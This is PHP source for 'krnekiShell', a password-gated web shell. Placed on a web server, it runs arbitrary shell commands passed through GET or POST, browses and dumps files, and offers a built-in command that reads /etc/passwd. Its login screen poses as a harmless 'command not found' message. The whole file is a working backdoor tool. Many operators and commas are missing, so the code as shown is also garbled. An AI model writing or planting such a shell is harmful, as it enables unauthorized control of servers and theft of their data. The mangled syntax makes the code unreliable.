<?php
// krnekiShell v0.07 made by sverde1, root@shell~# Security group
// licenced under GPL Licence

$pass ''// input password in md5 format

// asigning extensions
$ext['php'] = array("php""php3""php4""php5""php6");
$ext['htm'] = array("htm""html""tpl");
$ext['img'] = array("jpg""gif""png""bmp""swf");
$ext['archive'] = array("zip""rar""tar""arj""uc2""gz""lha""ace""tgz""bz2""ha");
$ext['txt'] = array("txt");

$time microtime(true);
if (!session_id())
{
    session_start();
}
if(!isset($_GET['image']))
{
    function run($cmd)
    {
        return trim(`$cmd`);
    }

    function getext($filename)
    {
        return strtolower(strrev(substr(strrev($filename), 0strpos(strrev($filename),"."))));
    }

    function pwd($path)
    {
        $path explode("/"$path);
        $max count($path) -1;
        for($i 0$i $max$i++)
        {
            if($path[$i] == '..' && $path[$i -1] != '..' && $path[$i -1] != null)
            {
                $path[$i] = null;
                $path[$i -1] = null;
            }
        }

        foreach($path as $dir)
        {
            if(!is_null($dir))
            {
                $pwd[] = $dir;
            }
        }
        $pwd implode("/"$pwd);
        return $pwd;
    }

    function handle_cmd($cmd,$form NULL)
    {
        global $ext;
        if(isset($form)) { $form '&amp;form';    }
        $args explode(" "$cmd);
        $cmd array_shift($args);
        $args implode(" "$args);
        $args pwd($args);
        if($cmd == 'ls')
        {
            $results run('ls -alhF ' $args);
            $results explode("\n"$results);
            array_shift($results);
            foreach($results as $result)
            {
                $result preg_replace('!\s+!'' '$result);
                $columns explode(" "$result);
                $kind explode("/"$columns[8]);
                if(isset($kind[1]))
                {
                    if($kind[0] == '..')
                    {
                        $folders[] = handle_ls('up','DIR',$_SERVER['PHP_SELF'] . '?cmd=' $cmd '%20' $args $columns[8],'[' $columns[8] . ']','&lt;DIR&gt;',$columns[5] . ' ' $columns[6],$columns[2] . '/' $columns[3],$columns[0],$form);
                    }
                    else
                    {
                        $folders[] = handle_ls('folder','DIR',$_SERVER['PHP_SELF'] . '?cmd=' $cmd '%20' $args $columns[8],'[' $columns[8] . ']','&lt;DIR&gt;',$columns[5] . ' ' $columns[6],$columns[2] . '/' $columns[3],$columns[0],$form);
                    }
                }
                else
                {
                    $file explode("*"$columns[8]);
                    $extension getext($file[0]);
                    if(in_array($extension$ext['php']))
                    {
                        $files[] = handle_ls('php','PHP',$_SERVER['PHP_SELF'] . '?cmd=php%20' $args $file[0],$file[0],$columns[4],$columns[5] . ' ' $columns[6],$columns[2] . '/' $columns[3],$columns[0],$form);
                    }
                    elseif(in_array($extension$ext['htm']))
                    {
                        $files[] = handle_ls('html','HTM',$args $file[0],$file[0],$columns[4],$columns[5] . ' ' $columns[6],$columns[2] . '/' $columns[3],$columns[0]);
                    }
                    elseif(in_array($extension$ext['img']))
                    {
                        $files[] = handle_ls($extension,strtoupper($extension),'?image=img%20' $args $file[0],$file[0],$columns[4],$columns[5] . ' ' $columns[6],$columns[2] . '/' $columns[3],$columns[0]);
                    }
                    elseif(in_array($extension$ext['archive']))
                    {
                        $files[] = handle_ls('archive',strtoupper($extension),$args $file[0],$file[0],$columns[4],$columns[5] . ' ' $columns[6],$columns[2] . '/' $columns[3],$columns[0]);
                    }
                    elseif(in_array($extension$ext['txt']))
                    {
                        $files[] = handle_ls('txt',strtoupper($extension),$args $file[0],$file[0],$columns[4],$columns[5] . ' ' $columns[6],$columns[2] . '/' $columns[3],$columns[0]);
                    }
                    else
                    {
                        $files[] = handle_ls('other','&nbsp;&nbsp;&nbsp;',$args $file[0],$file[0],$columns[4],$columns[5] . ' ' $columns[6],$columns[2] . '/' $columns[3],$columns[0]);
                    }
                }
            }
            return '<table border="1">' "\n" '<tr style=" background-color: #0054E3; color: #FFFFFF;">' "\n" '<td colspan="6"><b>./' $args '</b></td></tr>' "\n" '<tr><td colspan="2">Name</td><td>Size</td><td>Date</td><td>Owner/Group</td><td>Atributes</td></tr>' "\n" . @implode($folders) . @implode($files) . '</table>';
        }
        elseif($cmd == 'php')
        {
            return run('php -s ' $args);
        }
        elseif($cmd == 'passwd')
        {
            return '<pre>' run('cat /etc/passwd') . '</pre>';
        }
        else
        {
            return '<pre>' run($cmd) . '</pre>';
        }
    }

    function handle_ls($img,$alt,$cmd,$name,$size,$date,$owner,$rights,$form NULL)
    {
        return '<tr><td align="center"><img src="?image=' $img '" alt="[' $alt ']" /></td><td><a href="' $cmd $form '">' $name '</a></td><td align="right">' $size '</td><td>' $date '</td><td>' $owner '</td><td>' $rights '</td></tr>' "\n";
    }

    function html($type,$cmd NULL)
    {
        switch($type) {
        case "head":
            $html =
            '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"' "\n" .
            '    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">' "\n" .
            '<html xmlns="http://www.w3.org/1999/xhtml">' "\n" .
            '<head>' "\n" .
            '<title>PHP Shell :: ' $cmd '</title>' "\n" .
            '<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />' "\n" .
            '<style type="text/css">' "\n" .
            '    td { font-size: 8pt; font-family: verdana; padding-left: 2px; padding-right: 2px; }' "\n" .
            '    a:link { text-decoration: none; color: #0000FF; }' "\n" .
            '    a:visited {    text-decoration: none; color: #0000FF; }' "\n" .
            '    a:hover { text-decoration: none; color: #FF0000; }' "\n" .
            '    a:active { text-decoration: none; color: #FF0000; }' "\n" .
            '</style>' "\n" .
            '</head>' "\n" .
            '<body>' "\n";
            break;
        case "footer":
            $html "\n" '<p align="center">The page was generated in ' $cmd ' seconds</p></body></html>';
            break;
        case "form":
            $html =
            '<form action="' $_SERVER['PHP_SELF'] . '" method="post">' "\n" .
            'Command:&nbsp;<input type="text" style="width: 750px;" value="' $cmd '" name="system" />&nbsp;' "\n" .
            '<input type="submit" name="submit" value="Execute" /></form>' "\n";
        }
        return $html;
    }
}

if(isset($_GET['image']))
{
    function images($name)
    {
        $path explode(" "$name);
        $type array_shift($path);
        if($type == 'img')
        {
            global $ext;
            $pic explode("."$path[0]);
            $pic array_pop($pic);
            if(in_array($pic$ext['img']))
            {
                if($pic == 'jpg') { $pic 'jpeg'; }
                $cmd 'cat ' $path[0];
                $pic == 'swf' ?    $header 'application/x-shockwave-flash' $header 'image/' $pic;
                return header('Content-type: ' $header) . trim(`$cmd`);
            }
        }
        else
        {
            switch($name) {
                case "archive":
                    $content =
                    'eNrty9EKgjAYBeBHUkihLrr4929tc435G2S3scRp6iCh6O2Teoz8bs7hwKnSQTo+BAHgQHv4KpMENEI'.
                    'Lq9Xqr6DKGdilWDj+FgLIlggOwGuF2EYrOSNv0CJl3kikezexsFyk5L2oH2VLcb4ahb65yf4V04Zkuh'.
                    's3RfvW29PBitrlKlSF7wz0z+ZiJirsyMR4vjIWCfi8/wB3YTOP';
                    break;
                case "bmp":
                    $content =
                    'eNrt1EsOgjAYBOAjoQYTNy7+/q2lQEEeFWWHYEqQRxNikNurMZ5Cvs1M5gATr1oe0rZmABGIEn4sG0F'.
                    'LCtPRsqwJFovFP0BnS0C+iwL/u0RAPlE3AKPwEfUg+fsYSo9LnISSBCP1cBk+bY0UkyozQTMN8nYkOh'.
                    'QO65JcMjgwlSjRzvkFU28TZDG7p2Z8XH11RiP6dKtGEmb97DjdbA68Em6AJ1pre1f4PF57dWGiouQAd'.
                    'Ny/ACuoPcw=';
                    break;
                case "folder":
                    $content =
                    'eNp1iMkOgjAURT+pKJMuXLxCpTKE0gixSwUKJA0yJCB8vahrz+aec7mmvNhVNZkhgTCCLwwhZC45RHY'.
                    'sNm23XicUt0zqx63RDP9xqImBbFJB+HuugD/DOYmU39uaYS2dhV9jQ0mGCQTCSdngdjZVN16QZ9Q75a'.
                    'NDhshrKVcvqakhuGB478aKsiaY+2LH+sMyZFmlJ6KkJheBOfjyfk5T0CdsSHzB4I6nN4T4QhU=';
                    break;
                case "gif":
                    $content=
                    'eNrt1E1uwjAUBOAjBcSPumExfnFsh7wEE4UEdohCSGWLorYycPoGcQzybWY0B5j1yKkidmcJWJgDXgg'.
                    'whJZjhFUURQGDweAdkJ4JcF8qZK/FQjzj3AE/JiNqL6z6YzgsFVMwFQuy1V8q6TZtKabys/7Ov8KFjy'.
                    'vRFkZLX+6kWieJ8hPdlVb6BjXUXrhHyvclh6aaaPeYsd/m49N8nPj7VXa2xK/XmbhNP2oXX3PapN1o2'.
                    '59UERaLf87PPVY=';
                    break;
                case "html":
                    $content =
                    'eNrty1FvgjAUBeAftIepGZt7vLSWXgpIZYL1baC5gETFjbT46+fmr1ji93JOTnJWky5Y8q7mGjRgBX+'.
                    '4l2+nXluOu0NrxdXNxLSrez2TTXAJVPNSiq16UvvVOSsv+HqcRZv0fR8Nz/Dw8PCvMen5EN/KHKL7ko'.
                    'D/G40A/4CSt5aqheS+PW2WDYBBxhyMGyQgEyDLqr5MOFlUcVBPbRT6zhrkYPWpYH6mYxSsMyoPGXnVY'.
                    'IBclQf8Q2v1CYR6nRyv4XwCUNSjkLebwcUaJ6oIe0uGnZgO7bfsiSoScK6HcsWo3+2d8Q6ZSFsXJiRN'.
                    'nKpOfzkEePsBq65RQA==';
                    break;
                case "jpg":
                    $content =
                    'eNrt1E0OgjAQBeADucBETdy4mA6lFFoQsfizVSw/bdQQU/T0oh5DvuTlTeYAbzM1LPVNRQEy4Cf44vi'.
                    'Nlj64ted5Dkaj0T/AcEFADocC8ftkQD5V1QAdF4j6KtkwDKeYSXRcSYKZekQU+7lGH/Pz7pY07irLNd'.
                    'EpD6nNj5JCUNCcUbNZUKu4ucQJtvrYPQsZsknP223UPbdiPyvPgX3dAlbzKLGhIP18uTP+PcEiatRhG'.
                    'KnUrVZvBa893Q==';
                    break;
                case "other":
                    $content =
                    'eNrtzckKwjAYBOAH8pAgCPXgYbK1PzXauOByLSVRK1iqpPXpLfoY9rvMMJfZ8DpdqzoohwJU4oskvFW'.
                    'IBWMsYjQa/QuZzQTsUByWv2UFJEMEA1jK9MV5q4GOmp30PtrUyLi3JXl3uhFSmP3TBke8Mrh2k0yInp'.
                    'JqS/yeMwr9Wb8OOZ83Rsv3o5269Fg0Qgxnql18AEjML8U=';
                    break;
                case "php":
                    $content =
                    'eNrt1E0OgjAUBOADscAY/zYsXh8FKjwLYiGwM2hQAyIRU7i9qMeQbzOTOcDsZ5Ur7erCASIQBXx5p3U'.
                    'nEEqyQYemaWqYTCb/AL0lAxqLguC3RMA+cbkCPEWAWDbkjsdQ+C6hFooYRuq15dgvSrQxPqWP3U03dA'.
                    '5ZKYXH6zgnDg5XsRLVkGd48OdyqOB+WBbHVNSu7Mb9wVdpmMwNx8Gh5UYUI2+9gPWLTUp2S0aSX2fZe'.
                    'FJSW9YbP0I9JA==';
                    break;
                case "png":
                    $content =
                    'eNrt1EEOgjAQBdADuUCNGjcsptNSKoxQsRDdogEUgkZN5faCHkNeMpmff4C/m9Yy4nUpADSoHL7UcAg'.
                    'FcbCx4zgWRqPRP0B/yYD6YCD8NRrY8MoK4KFCxKIl2Q9DHkhCqwwx1Oa1EfheFMgxOWW37cW2dI5ZES'.
                    'lfNMmRBHjCJCaou2XepCRl5cdD7gzVk+iJ1/3NrDKayZXnYReIuU5Q3P2QvRfrjPidJumxmh76kYqs6'.
                    '34A4fw8sw==';
                    break;
                case "swf":
                    $content =
                    'eNrt1M1ygjAUhuELcsNUtN24ODmJ4RiBRioVdkA1QfCnFSfC1beOV9EZn9U73wV8K6+VMW8t16CBKng'.
                    'wXpos1pXX2a+26+1RBYcFJo2//Tznyf5SFi/ddDS9lT9iCIfIi8rK7wY72Y67VwNPT0//FQYTBiEAA1'.
                    'g+lujeALUFFI0UxjkdEjJxrd45gI6RM1JlvAedxQHvqY7C2tGlCNGOKI+MMZn84DVcRNj0viPBLFE6Z'.
                    '8YRINpJtUE+AAmOVhsiZnKiOWPaFQGDvztBdXtrFHE4GXVM4Uq5QKOrNYI+eYVgRjkpuVOndIumDDOu'.
                    'blLkOwYukx2O++9ct2Pla160u8NyA/2iIYlw1psEVroBiN1s9gtRjV3N';
                    break;
                case "txt":
                    $content =
                    'eNrtzEFOwzAQBdADdYFrihIWXYw9hsSp6zoBtckucSoXWiephHDh9FhwCqS8zZdG/09JLs8aLyceQEN'.
                    'u4VfW0H7o70O24G5iV5U3o6lvy7atnnYN5YcN7V5ab7qP6q66Hoep85Qk3wXRCXmE2Wz2b/HsgYECYA'.
                    'Cbv0uMVYyTBS7Oe4EuQC54CM5pBi4uEMLqdRsrRjF0Y0rU+80YrpAUBe6GMti3Upap4ogghTdyuWgP6'.
                    'N1kv+ot/dz38lw16QgoEoraO6jjH+aOaDmRTmVgBOiwXv8A+jQ8/g==';
                    break;
                case "up":
                    $content =
                    'eNrt1EsKwjAYBOADdWMFoRsXkz+PJjSGVAp2HTQRWypkYfH0Bj2G/WCYOcH0u0k5PiUBdNABP4SoS7D'.
                    'ZbP4KtQcGW4Yth/DlgVwqSSBoRvRarOJg+nrhMY6eJEcgEuh1dkK8pepMWpdGuTaGqqZYvgTMDM3+Kd'.
                    'NqBuVFPVc3l86jmC2T7n5iDw+ejx8Uai8A';
                    break;
            }
            return header("Content-type: image/gif") . base64_decode(gzuncompress(base64_decode($content)));
        }
    }
}

if(isset($_GET['cmd']) && $_SESSION['exec'] === $pass)
{
    echo html('head',addslashes($_GET['cmd']));
    if(isset($_GET['form']) && !isset($_GET['image'])) { echo html('form',$_GET['cmd']); }
    echo '<hr />' handle_cmd(addslashes($_GET['cmd']),$_GET['form']) . '<hr />' html('footer',round(microtime(true) - $time4));
}
elseif(isset($_GET['image']) && $_SESSION['exec'] === $pass)
{
    echo images(addslashes($_GET['image']));
}
elseif(isset($_POST['system']) && $_SESSION['exec'] === $pass)
{
    echo html('head',pwd($_POST['system'])) . html('form',pwd($_POST['system'])) . '<hr />' handle_cmd(pwd($_POST['system']),TRUE) . '<hr />' html('footer',round(microtime(true) - $time4));
}
elseif(!isset($_SESSION['exec']) && isset($_POST['submit']) && md5($_POST['system']) === $pass)
{
    $_SESSION['exec'] = md5($_POST['system']);
    echo html('head','ls') . html('form''ls') . '<hr />' handle_cmd('ls',TRUE) . '<hr />' html('footer',round(microtime(true) - $time4));
}
else
{
    echo html('head''Input command') . html('form') . '<hr /><pre>-shell: ' $_POST['system'] . ': command not found</pre><hr />' html('footer',round(microtime(true) - $time4));
}
?>